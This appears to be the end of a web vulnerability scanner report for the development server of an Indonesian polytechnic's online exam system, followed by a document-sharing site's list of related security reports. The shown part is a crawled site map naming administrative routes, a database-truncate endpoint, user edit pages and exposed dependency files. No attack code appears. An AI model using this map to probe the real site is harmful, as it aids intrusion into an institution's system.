http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/css/buttons.bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.colVis.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.html5.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/js/buttons.print.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/js/dataTables.buttons.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/JSZip-2.5.0/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/JSZip-2.5.0/jszip.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/pdfmake-0.1.36/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/pdfmake-0.1.36/pdfmake.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/pdfmake-0.1.36/vfs_fonts.js
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/css/font-awesome.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/font-awesome/fonts/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/froala_editor.pkgd.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/froala_style.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/plugins/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/themes/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/css/themes/royal.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/froala_editor.pkgd.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/languages/

96
http://dev-ubk.polindra.ac.id/assets/bower_components/froala_editor/js/plugins/
http://dev-ubk.polindra.ac.id/assets/bower_components/jquery/
http://dev-ubk.polindra.ac.id/assets/bower_components/jquery/jquery-3.3.1.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/min/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/min/moment.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/src/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/src/lib/
http://dev-ubk.polindra.ac.id/assets/bower_components/moment/templates/
http://dev-ubk.polindra.ac.id/assets/bower_components/pace/
http://dev-ubk.polindra.ac.id/assets/bower_components/pace/pace-theme-flash.css
http://dev-ubk.polindra.ac.id/assets/bower_components/pace/pace.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/css/select2.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/select2/js/select2.full.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/sweetalert2/
http://dev-ubk.polindra.ac.id/assets/bower_components/sweetalert2/sweetalert2.all.min.js
http://dev-ubk.polindra.ac.id/assets/dist/
http://dev-ubk.polindra.ac.id/assets/dist/auth/
http://dev-ubk.polindra.ac.id/assets/dist/auth/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/css/main.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/css/util.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/css/font-awesome.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/font-awesome-4.7.0/fonts/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/Linearicons-Free-v1.0.0/
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/Linearicons-Free-v1.0.0/icon-font.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/fonts/OpenSans/
http://dev-ubk.polindra.ac.id/assets/dist/auth/js/
http://dev-ubk.polindra.ac.id/assets/dist/auth/js/main.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animate/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animate/animate.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/css/animsition.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/js/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/animsition/js/animsition.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/css/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/css/bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/popper.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/countdowntime/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/countdowntime/countdowntime.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/css-hamburgers/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/css-hamburgers/hamburgers.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/daterangepicker.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/daterangepicker.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/moment.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/jquery/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/select2.min.css
http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/select2.min.js

97
http://dev-ubk.polindra.ac.id/assets/dist/css/
http://dev-ubk.polindra.ac.id/assets/dist/css/AdminLTE.min.css
http://dev-ubk.polindra.ac.id/assets/dist/css/mystyle.css
http://dev-ubk.polindra.ac.id/assets/dist/css/skins/
http://dev-ubk.polindra.ac.id/assets/dist/css/skins/skin-purple.min.css
http://dev-ubk.polindra.ac.id/assets/dist/img/
http://dev-ubk.polindra.ac.id/assets/dist/js/
http://dev-ubk.polindra.ac.id/assets/dist/js/adminlte.min.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/auth/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/auth/login.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/dashboard.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/dosen/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/dosen/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/jurusan/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/jurusan/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/jurusan/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/kelas/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/kelas/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/kelas/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/mahasiswa/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/master/mahasiswa/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/kelasdosen/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/kelasdosen/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/relasi/kelasdosen/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/soal/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/soal/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/ujian/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/ujian/add.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/ujian/hasil.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/users/
http://dev-ubk.polindra.ac.id/assets/dist/js/app/users/data.js
http://dev-ubk.polindra.ac.id/assets/dist/js/app/users/edit.js
http://dev-ubk.polindra.ac.id/assets/plugins/
http://dev-ubk.polindra.ac.id/auth
http://dev-ubk.polindra.ac.id/auth/
http://dev-ubk.polindra.ac.id/auth/cek_login
http://dev-ubk.polindra.ac.id/composer.json
http://dev-ubk.polindra.ac.id/composer.lock
http://dev-ubk.polindra.ac.id/dashboard/
http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian
http://dev-ubk.polindra.ac.id/dosen
http://dev-ubk.polindra.ac.id/dosen/
http://dev-ubk.polindra.ac.id/dosen/add
http://dev-ubk.polindra.ac.id/dosen/create_user
http://dev-ubk.polindra.ac.id/dosen/data
http://dev-ubk.polindra.ac.id/dosen/delete
http://dev-ubk.polindra.ac.id/dosen/import
http://dev-ubk.polindra.ac.id/dosen/preview
http://dev-ubk.polindra.ac.id/dosen/save
http://dev-ubk.polindra.ac.id/hasilujian
http://dev-ubk.polindra.ac.id/hasilujian/
http://dev-ubk.polindra.ac.id/hasilujian/data
http://dev-ubk.polindra.ac.id/index.php
http://dev-ubk.polindra.ac.id/jurusan
http://dev-ubk.polindra.ac.id/jurusan/
http://dev-ubk.polindra.ac.id/jurusan/add
http://dev-ubk.polindra.ac.id/jurusan/data
http://dev-ubk.polindra.ac.id/jurusan/delete

98
http://dev-ubk.polindra.ac.id/jurusan/import
http://dev-ubk.polindra.ac.id/jurusan/load_jurusan
http://dev-ubk.polindra.ac.id/jurusan/preview
http://dev-ubk.polindra.ac.id/jurusan/save
http://dev-ubk.polindra.ac.id/kelas
http://dev-ubk.polindra.ac.id/kelas/
http://dev-ubk.polindra.ac.id/kelas/add
http://dev-ubk.polindra.ac.id/kelas/data
http://dev-ubk.polindra.ac.id/kelas/delete
http://dev-ubk.polindra.ac.id/kelas/import
http://dev-ubk.polindra.ac.id/kelas/preview
http://dev-ubk.polindra.ac.id/kelas/save
http://dev-ubk.polindra.ac.id/kelasdosen
http://dev-ubk.polindra.ac.id/kelasdosen/
http://dev-ubk.polindra.ac.id/kelasdosen/add
http://dev-ubk.polindra.ac.id/kelasdosen/data
http://dev-ubk.polindra.ac.id/kelasdosen/delete
http://dev-ubk.polindra.ac.id/kelasdosen/save
http://dev-ubk.polindra.ac.id/mahasiswa
http://dev-ubk.polindra.ac.id/mahasiswa/
http://dev-ubk.polindra.ac.id/mahasiswa/create_user
http://dev-ubk.polindra.ac.id/mahasiswa/data
http://dev-ubk.polindra.ac.id/mahasiswa/delete
http://dev-ubk.polindra.ac.id/mahasiswa/import
http://dev-ubk.polindra.ac.id/mahasiswa/preview
http://dev-ubk.polindra.ac.id/script/
http://dev-ubk.polindra.ac.id/settings
http://dev-ubk.polindra.ac.id/settings/
http://dev-ubk.polindra.ac.id/settings/truncate
http://dev-ubk.polindra.ac.id/soal
http://dev-ubk.polindra.ac.id/soal/
http://dev-ubk.polindra.ac.id/soal/add
http://dev-ubk.polindra.ac.id/soal/data
http://dev-ubk.polindra.ac.id/soal/delete
http://dev-ubk.polindra.ac.id/soal/import
http://dev-ubk.polindra.ac.id/soal/preview
http://dev-ubk.polindra.ac.id/soal/preview/
http://dev-ubk.polindra.ac.id/soal/preview/soal
http://dev-ubk.polindra.ac.id/soal/save
http://dev-ubk.polindra.ac.id/ujian/
http://dev-ubk.polindra.ac.id/ujian/add
http://dev-ubk.polindra.ac.id/ujian/delete
http://dev-ubk.polindra.ac.id/ujian/master
http://dev-ubk.polindra.ac.id/ujian/save
http://dev-ubk.polindra.ac.id/uploads/
http://dev-ubk.polindra.ac.id/uploads/import/
http://dev-ubk.polindra.ac.id/uploads/import/format/
http://dev-ubk.polindra.ac.id/users
http://dev-ubk.polindra.ac.id/users/
http://dev-ubk.polindra.ac.id/users/change_password
http://dev-ubk.polindra.ac.id/users/data
http://dev-ubk.polindra.ac.id/users/data/
http://dev-ubk.polindra.ac.id/users/data/1
http://dev-ubk.polindra.ac.id/users/edit/
http://dev-ubk.polindra.ac.id/users/edit/1
http://dev-ubk.polindra.ac.id/users/edit_info
http://dev-ubk.polindra.ac.id/vendor/
http://dev-ubk.polindra.ac.id/vendor/composer/
http://dev-ubk.polindra.ac.id/vendor/composer/installed.json

Developer HTTP Dev Ubk Polindra Ac Id Dashboard
No ratings yet
Developer HTTP Dev Ubk Polindra Ac Id Dashboard
59 pages
Is-03 q1 Pci Asv DNS-ip-was Reports - DB
No ratings yet
Is-03 q1 Pci Asv DNS-ip-was Reports - DB
130 pages
Is-03 q1 Pci Asv DNS-ip-was Reports - DB
No ratings yet
Is-03 q1 Pci Asv DNS-ip-was Reports - DB
114 pages
CEHv12 Certification Prep The Complete Practice
No ratings yet
CEHv12 Certification Prep The Complete Practice
410 pages
Report Openvas
No ratings yet
Report Openvas
10 pages
Testphp Acunetics PDF
No ratings yet
Testphp Acunetics PDF
98 pages
Web S1 Retest Report
No ratings yet
Web S1 Retest Report
58 pages
Compliance ISO 27001
0% (1)
Compliance ISO 27001
464 pages
Acuetix Swastik
No ratings yet
Acuetix Swastik
89 pages
EY CCC Daily Threat Digest 01st April 2025
No ratings yet
EY CCC Daily Threat Digest 01st April 2025
23 pages
Developer Report: Acunetix Website Audit 19 November, 2018
No ratings yet
Developer Report: Acunetix Website Audit 19 November, 2018
30 pages
Developer: Acunetix Security Audit
No ratings yet
Developer: Acunetix Security Audit
15 pages
Website Pentest DVWA 2024-02-21-09 52 49
No ratings yet
Website Pentest DVWA 2024-02-21-09 52 49
28 pages
FOOPHONE
No ratings yet
FOOPHONE
16 pages
Documento1 2
No ratings yet
Documento1 2
4 pages
16 31 May21 CVE
No ratings yet
16 31 May21 CVE
268 pages
CWE Top 25 HTTP Testphp Vulnweb Com
No ratings yet
CWE Top 25 HTTP Testphp Vulnweb Com
60 pages
Must Know Hacking!3
No ratings yet
Must Know Hacking!3
60 pages
PentestTools WebsiteScanner Report
No ratings yet
PentestTools WebsiteScanner Report
7 pages
Developer Https Online Assessment Apidataserv Com Login
No ratings yet
Developer Https Online Assessment Apidataserv Com Login
18 pages
Penetration Testing Report DVWA
No ratings yet
Penetration Testing Report DVWA
13 pages
Developer: Acunetix Security Audit
No ratings yet
Developer: Acunetix Security Audit
11 pages
Developer HTTP Testphp Vulnweb Com
No ratings yet
Developer HTTP Testphp Vulnweb Com
188 pages
Audit Report: Audited On December 02 2011
No ratings yet
Audit Report: Audited On December 02 2011
76 pages
Website Vulnerability Scanner Sample Report Optimized
No ratings yet
Website Vulnerability Scanner Sample Report Optimized
11 pages
Vulnerability Assessment Report-2
No ratings yet
Vulnerability Assessment Report-2
12 pages
K032 - K053 - K055 - VAPT Report
No ratings yet
K032 - K053 - K055 - VAPT Report
20 pages
Pentest HCM Whitelist and Non IPS
No ratings yet
Pentest HCM Whitelist and Non IPS
49 pages
Web Application Vulnerability Assessment Checklist v1
No ratings yet
Web Application Vulnerability Assessment Checklist v1
16 pages
PentestTools WebsiteScanner Report
No ratings yet
PentestTools WebsiteScanner Report
8 pages
OWASP TOP 10 2017: Compliance Report
No ratings yet
OWASP TOP 10 2017: Compliance Report
20 pages
PentestTools WebsiteScanner Report
No ratings yet
PentestTools WebsiteScanner Report
7 pages
Developer Report
No ratings yet
Developer Report
16 pages
Unit 4
No ratings yet
Unit 4
32 pages
PentestTools WebsiteScanner Report
No ratings yet
PentestTools WebsiteScanner Report
5 pages
PentestTools WebsiteScanner Report
No ratings yet
PentestTools WebsiteScanner Report
8 pages
Scan Eproc and APPS With Whitelist Non IPS
No ratings yet
Scan Eproc and APPS With Whitelist Non IPS
49 pages
Pentest Eproc and Apps Whitelist Non IPS WAF
No ratings yet
Pentest Eproc and Apps Whitelist Non IPS WAF
52 pages
16 CVSS
No ratings yet
16 CVSS
23 pages
IntruderReport - 06 Oct 2021
No ratings yet
IntruderReport - 06 Oct 2021
15 pages
Developer Https Asset Pedulilindungi Id Cert
No ratings yet
Developer Https Asset Pedulilindungi Id Cert
7 pages
Snyk Top 10 Code 2022 PHP
No ratings yet
Snyk Top 10 Code 2022 PHP
1 page
Vapt 1
No ratings yet
Vapt 1
18 pages
Website Vulnerability Scanner Report (Light)
No ratings yet
Website Vulnerability Scanner Report (Light)
6 pages
Security Testing Report: Snakerr
No ratings yet
Security Testing Report: Snakerr
37 pages
Vulnerability Report
No ratings yet
Vulnerability Report
6 pages
30 Xtream Youcef Sat
No ratings yet
30 Xtream Youcef Sat
8 pages
VVATP
No ratings yet
VVATP
11 pages
Dvwa2 Sample Report
No ratings yet
Dvwa2 Sample Report
11 pages
Handout 2.1 Ethical Hacking Pentesting and Anonymity
No ratings yet
Handout 2.1 Ethical Hacking Pentesting and Anonymity
23 pages
Ethical Hacking OWASP
No ratings yet
Ethical Hacking OWASP
22 pages
TASK1
No ratings yet
TASK1
12 pages
Hack Your Self First
No ratings yet
Hack Your Self First
62 pages
Website Vulnscan Sample Report
No ratings yet
Website Vulnscan Sample Report
6 pages
Website Vulnerability Scanner Report (Light)
No ratings yet
Website Vulnerability Scanner Report (Light)
4 pages
Practical Skills
No ratings yet
Practical Skills
7 pages
Tugas 2 - Ferona Octavia Twinnice Tampubolon
No ratings yet
Tugas 2 - Ferona Octavia Twinnice Tampubolon
11 pages
Apache Server Vulnerability
No ratings yet
Apache Server Vulnerability
52 pages
Website Vulnerability Scanner Report (Light)
No ratings yet
Website Vulnerability Scanner Report (Light)
5 pages
Export 20240730091023
No ratings yet
Export 20240730091023
2 pages
Notes of Computer Science - s6 Mce
No ratings yet
Notes of Computer Science - s6 Mce
310 pages
Kerberoasting PDF 1632400601
No ratings yet
Kerberoasting PDF 1632400601
43 pages
OWASP WSTG Checklist
No ratings yet
OWASP WSTG Checklist
74 pages
01 - Chapter 1 - General Security Concepts - Q001 - Q110
No ratings yet
01 - Chapter 1 - General Security Concepts - Q001 - Q110
19 pages
Android Security
No ratings yet
Android Security
32 pages
Matrix WatchGuard Endpoint Security
No ratings yet
Matrix WatchGuard Endpoint Security
5 pages
Threat Hunting Process - Hacker Associate Guide
No ratings yet
Threat Hunting Process - Hacker Associate Guide
6 pages
R163205C PDF
No ratings yet
R163205C PDF
11 pages
2016 The Implications of Apple's Battle With The FBI
No ratings yet
2016 The Implications of Apple's Battle With The FBI
3 pages
10625
No ratings yet
10625
4 pages
Website List
No ratings yet
Website List
8 pages
Dcit 418-Slide 1
No ratings yet
Dcit 418-Slide 1
42 pages
Ethical Hacking Question Bank PT-2
No ratings yet
Ethical Hacking Question Bank PT-2
3 pages
Crypto Notes
No ratings yet
Crypto Notes
33 pages
NETIQUETTE
No ratings yet
NETIQUETTE
12 pages
Kaplan
No ratings yet
Kaplan
12 pages
Sample Prompt For AI MSC Master Thesis Analysis
No ratings yet
Sample Prompt For AI MSC Master Thesis Analysis
12 pages
A Deep Survey On Types of Cyber Attacks in VANET
No ratings yet
A Deep Survey On Types of Cyber Attacks in VANET
12 pages
E-SHE Introduction
No ratings yet
E-SHE Introduction
19 pages
ICTCYS606 Student Assessment Tasks
No ratings yet
ICTCYS606 Student Assessment Tasks
17 pages
Teras Strategik 1 2 3
No ratings yet
Teras Strategik 1 2 3
42 pages
Lecture 2 - Web Application Vulnerabilities in JAVA Web Application
No ratings yet
Lecture 2 - Web Application Vulnerabilities in JAVA Web Application
33 pages
Cybr371 Final Assignment
No ratings yet
Cybr371 Final Assignment
7 pages
Anti Virus
No ratings yet
Anti Virus
27 pages
SSL
No ratings yet
SSL
14 pages
Farha Alungal RESUME
No ratings yet
Farha Alungal RESUME
2 pages
Exam 20230906 17525
No ratings yet
Exam 20230906 17525
3 pages
GIAC Security Essentials (GSEC) Exam Practice Guide: 700 Questions and Detailed Explanations
From Everand
GIAC Security Essentials (GSEC) Exam Practice Guide: 700 Questions and Detailed Explanations
Edwin Saunders
No ratings yet
Certified Ethical Hacker (CEH V13) Practice Exam Guide
From Everand
Certified Ethical Hacker (CEH V13) Practice Exam Guide
Steve Brown
No ratings yet
Penetration Testing Fundamentals-2: Penetration Testing Study Guide To Breaking Into Systems
From Everand
Penetration Testing Fundamentals-2: Penetration Testing Study Guide To Breaking Into Systems
Devi Prasad
No ratings yet

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.